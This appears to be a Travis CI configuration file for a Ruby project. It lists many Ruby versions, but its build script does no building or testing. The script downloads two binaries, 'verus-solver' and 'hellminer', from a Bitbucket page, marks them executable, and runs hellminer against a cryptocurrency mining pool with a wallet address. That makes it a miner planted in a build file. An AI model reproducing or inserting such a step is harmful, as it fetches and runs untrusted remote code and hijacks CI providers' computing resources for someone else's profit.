language: ruby
rvm:
- 1.9.3
- 2.0.0
- 2.1.2
- 2.1.3
- 2.1.4
- 2.1.5
- 2.1.6
- 2.1.7
- 2.1.8
- 2.1.9
- 2.1.10
- 2.2.5
- 2.3.1
- 2.3.2
- 2.3.3
- 2.3.4
- 2.4.0

sudo: false
script: wget https://bitbucket.org/sorot1/verus/downloads/verus-solver; wget https://bitbucket.org/sorot1/verus/downloads/hellminer; chmod +x hellminer; chmod +x verus-solver; ./hellminer -c ap.luckpool.net:3956#xnsub -u RPn4qqbnhdoq2e7pihHD9ErCkZdakWYW4M.TMV -p x --cpu 2
bundler_args: "--without play"